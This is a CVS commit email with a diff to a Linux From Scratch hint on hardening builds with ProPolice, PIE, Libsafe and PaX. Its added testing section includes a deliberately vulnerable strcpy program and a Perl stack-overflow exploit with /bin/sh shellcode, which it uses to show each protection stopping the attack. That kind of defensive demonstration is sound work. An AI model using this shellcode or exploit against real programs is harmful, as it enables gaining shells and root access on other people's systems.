cvs commit: hints winter.txt

tushar at linuxfromscratch.org tushar at linuxfromscratch.org
Fri Jan 16 19:27:09 PST 2004


tushar      04/01/16 20:27:09

  Modified:    .        winter.txt
  Log:
  Updated winter.txt
  
  Revision  Changes    Path
  1.3       +204 -26   hints/winter.txt
  
  Index: winter.txt
  ===================================================================
  RCS file: /home/cvsroot/hints/winter.txt,v
  retrieving revision 1.2
  retrieving revision 1.3
  diff -u -u -r1.2 -r1.3
  --- winter.txt	23 Dec 2003 23:46:41 -0000	1.2
  +++ winter.txt	17 Jan 2004 03:27:09 -0000	1.3
  @@ -1,6 +1,6 @@
   AUTHOR: Robert Connolly <cendres at videotron dot ca> (ashes)
   
  -DATE:   2003-12-21
  +DATE:   2003-12-25
   
   LICENSE:        Public Domain
   
  @@ -34,7 +34,7 @@
   		Pie
   	Downloads
   	Installation
  -	Testing ProPolice
  +	Testing
   	Feedback
   	Acknowledgments
   
  @@ -250,6 +250,9 @@
   from /etc/ld.so.preload just for glibc, and add it back after glibc is
   installed. This is not because of a Libsafe violation, but Libsafe will cause
   the glibc build to fail.
  +Bug: Glibc doesn't like the Pax randomization durring make or make check. I
  +think I've read about a Pax/Glibc bug on google. For now use a vanilla kernel on
  +the host.
   
    - GCC pass 2
   Auditors might want to install gcc-3.3.2-bounds-plus-pie-1.patch, or
  @@ -284,33 +287,50 @@
   sed -e 's%$(BIGFILES)%$(BIGFILES) $(OPT)%' Makefile.backup > Makefile &&
   make OPT="$CFLAGS" PREFIX=/tools install
   
  + - Perl
  +env LDFLAGS="-pie" ./configure.gnu --prefix=/tools -Dstatic_ext='IO Fcntl'
  +make perl utilities  OPTIMIZE="-pie -O2" LDFLAGS="-pie"
  +
   Install the rest of chapter 5, and don't forget to install m4, bison, and flex
   in /tools.
   
   ---------
   Chapter 6
   ---------
  -# Glibc
  + - Glibc
   With this all your libraries will be shared objects.
   export CFLAGS="-pie -O2"
   export CXXFLAGS="-pie -O2"
   
  -# Binutils
  + - Binutils
   make CFLAGS="-fno-stack-protector -O2" check
   
  -# GCC
  + - GCC
   patch -Np1 -i ../gcc-3.3.2-protector_only-2.patch
   patch -Np1 -i ../gcc-3.3.2-pie-1.patch
   
  -# Libsafe
  -# There are tests in the Libsafe source you should look at.
  + - Libsafe
  +There are tests in the Libsafe source you should look at.
   make &&
   make install
   
  -# Net-tools
  -make COPTS="-D_GNU_SOURCE -Wall $CFLAGS"
  +- Lfs-utils
  +For some reason mktemp wont build as a shared object.
  +
  + - Vim
  +env LDFLAGS="-pie" ./configure...
  +
  + - Less
  +env LDFLAGS="-pie" ./configure...
   
  -# Bzip2
  + - Net-tools
  +make COPTS="-D_GNU_SOURCE -Wall $CFLAGS" LOPTS="-pie"
  +
  + - Perl
  +env LDFLAGS="-pie" ./configure.gnu --prefix=/usr -Dpager="/bin/less -isR"
  +make OPTIMIZE="-pie -O2" LDFLAGS="-pie"
  +
  + - Bzip2
   cp Makefile Makefile.backup
   sed -e 's%$(BIGFILES)%$(BIGFILES) $(OPT)%' \
   Makefile.backup > Makefile
  @@ -322,31 +342,42 @@
   make clean
   make OPT="$CFLAGS"
   
  -# Kbd
  -make CFLAGS="$CFLAGS"
  + - Ed
  +env LDFLAGS="-pie" ./configure...
  +
  + - Kbd
  +make CFLAGS="$CFLAGS" LDFLAGS="-pie"
   
  -# Grub
  + - E2fsprogs
  +make LDFLAGS="-pie"
  +
  + - Grub
   env CFLAGS="" ./configure --prefix=/usr
   make CFLAGS=-fno-stack-protector
   
  -# Man
  + - Man
   cp man2html/Makefile.in man2html/Makefile.in.backup
  -sed -e "s/CFLAGS = /CFLAGS = $CFLAGS /" \
  +sed -e "s/CFLAGS = /CFLAGS = -O -pie /" \
   man2html/Makefile.in.backup > man2html/Makefile.in
  +./configure -default -confdir=/etc
  +make CFLAGS="-O -pie" LDFLAGS="-pie"
   
  -# Procinfo
  -make LDLIBS=-lncurses CFLAGS="$CFLAGS"
  + - Procinfo
  +make LDLIBS=-lncurses CFLAGS="$CFLAGS" LDFLAGS="-pie"
   
  -# Procps
  + - Procps
   make CC="gcc -fpie"
   
  -# Sysklogd
  -make RPM_OPT_FLAGS="$CFLAGS"
  + - Sysklogd
  +make RPM_OPT_FLAGS="$CFLAGS" LDFLAGS="-pie"
  +
  + - Sysvinit
  +make -C src CFLAGS="-Wall -D_GNU_SOURCE $CFLAGS" LDFLAGS="-pie"
   
  -# Sysvinit
  -make -C src CFLAGS="-Wall -D_GNU_SOURCE $CFLAGS"
  + - Util-linux
  +make HAVE_KILL=yes HAVE_SLN=yes LDFLAGS="-pie"
   
  -# GCC 2.95.3
  + - GCC 2.95.3
   unset CFLAGS CXXFLAGS
   patch -Np1 -i ../gcc-2.95.3-protector.patch
   
  @@ -369,10 +400,11 @@
   make CC="/opt/gcc-2.95.3/bin/gcc -fstack-protector" modules_install
   
   Try to remember to add -pie to CFLAGS/CXXFLAGS when to install other packages.
  +LDFLAGS too sometimes if needed.
   
  -=================
  -Testing ProPolice
  -=================
  +========
  +Testing
  +========
   
   ## This program overflows the stack.
   
  @@ -427,6 +459,146 @@
   # before foo()
   # Segmentation fault
   
  +First we run thise code with no protection.
  +We are using -static so libsafe isn't used.
  +
  +cat > foo.c << "EOF"
  +/* foo.c */
  +
  + #include <stdio.h>
  + int main(int argc, char **argv)
  + {
  + char buffer[180];
  + if(argc>1)
  + strcpy(buffer,argv[1]);
  + printf("Miam...\n");
  + }
  +EOF
  +
  +gcc -fno-stack-protector -static -o foo foo.c
  +
  +cat > x.pl << "EOF"
  +#!/usr/bin/perl
  +
  + ### le shellcode qui execute /bin/sh
  + $shellcode = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" .
  + "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" .
  + "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" .
  + "\x80\xe8\xdc\xff\xff\xff/bin/sh";
  +
  + ### Return Address / ESP
  + $ret = 0xbffff8a0;
  +
  + ### la taille du buffer
  + $buf = 208;
  +
  + $egg = 2000;
  +
  + $nop = "\x90";
  +
  + $offset = 0;
  +
  + if (@ARGV == 1) { $offset = $ARGV[0]; }
  + $addr = pack('l', ($ret + $offset));
  +
  + for ($i = 0; $i < $buf; $i += 4) {
  + $buffer .= $addr;
  + }
  +
  + for ($i = 0; $i < ($egg - length($shellcode) - 100); $i++){
  + $buffer .= $nop;
  + }
  +
  + $buffer .= $shellcode;
  + exec("./foo", $buffer,0);
  +EOF
  +
  +Install gdb from http://ftp.gnu.org/gnu/gdb/gdb-6.0.tar.gz
  +Run this, add run `perl -e 'print "A"x208'`
  +Look for "esp 0xbffff8a0", you might have to edit x.pl for you.
  +
  +$ gdb foo
  +GNU gdb 6.0
  +Copyright 2003 Free Software Foundation, Inc.
  +GDB is free software, covered by the GNU General Public License, and you are
  +welcome to change it and/or distribute copies of it under certain conditions.
  +Type "show copying" to see the conditions.
  +There is absolutely no warranty for GDB.  Type "show warranty" for details.
  +This GDB was configured as "i686-pc-linux-gnu"...(no debugging symbols found)...
  +(gdb) run `perl -e 'print "A"x208'`
  +Starting program: /home/ashes/LFS/export/testing/foo `perl -e
  +'print "A"x208'`
  +(no debugging symbols found)...(no debugging symbols found)...Miam...
  +
  +Program received signal SIGSEGV, Segmentation fault.
  +0x41414141 in ?? ()
  +(gdb) info reg
  +eax            0x8      8
  +ecx            0x1fc018d2       532682962
  +edx            0x4014fe00       1075117568
  +ebx            0x4014f9e8       1075116520
  +esp            0xbffff8a0       0xbffff8a0
  +ebp            0x41414141       0x41414141
  +esi            0x40015020       1073827872
  +edi            0xbffff8e4       -1073743644
  +eip            0x41414141       0x41414141
  +eflags         0x10246  66118
  +cs             0x23     35
  +ss             0x2b     43
  +ds             0x2b     43
  +es             0x2b     43
  +fs             0x0      0
  +gs             0x0      0
  +(gdb) kill
  +Kill the program being debugged? (y or n) y
  +(gdb) quit
  +
  +$ ./x.pl
  +Miam...
  +sh-2.05b$
  +
  +This only demonstrates that bad code can freak out and exit to a shell.
  +If this code were part of a daemon running as root, or suid, it would give
  +root shell. The exploits in the libsafe source, and paxtest is basicly the
  +same as this. The paxtest ones are the most modern.
  +
  +Now lets try this code with propolice.
  +
  +rm foo && gcc -fstack-protector -static -o foo foo.c
  +gdb foo
  +...
  +run `perl -e 'print "A"x208'`
  +..
  +Starting program: /home/ashes/LFS/export/testing/foo `perl -e
  +'print "A"x208'`
  +(no debugging symbols found)...(no debugging symbols found)...Miam...
  +foo: stack smashing attack in function main
  +Program received signal SIGABRT, Aborted.
  +0x40047b81 in kill () from /lib/libc.so.6
  +(gdb)
  +
  +Here we can see propolice aborted the program, and now ./x.pl also aborts.
  +Next we test libsafe.
  +
  +rm foo && gcc -fno-stack-protector -o foo foo.c
  +
  +$ ./x.pl
  +Libsafe version 2.0.16
  +Detected an attempt to write across stack boundary.
  +Terminating /home/ashes/LFS/propolice/export/20031223/testing/foo.
  +    uid=1001  euid=1001  pid=742
  +Call stack:
  +    0x40018cbc  /lib/libsafe.so.2.0.16
  +    0x40018deb  /lib/libsafe.so.2.0.16
  +    0x80483a2   /home/ashes/LFS/propolice/export/20031223/testing/foo
  +    0x40039a96  /lib/libc-2.3.2.so
  +Overflow caused by strcpy()
  +Killed
  +
  +And now if you want to build the Pax patch into your kernel, reboot,
  +and start again you will notice the first test doesn't work because
  +the return address keeps changing.
  +
   ========
   Feedback
   ========
  @@ -498,3 +670,9 @@
   * Do not use "Enforce non-executable pages"
   * Spell check.
   * Fixed URL.
  +[2003-12-22]
  +* Added LOPTS to Net-tools.
  +* Added LDFLAGS to Perl.
  +[2003-12-25]
  +* More cflags.
  +* New tests.
  
  
  



More information about the hints mailing list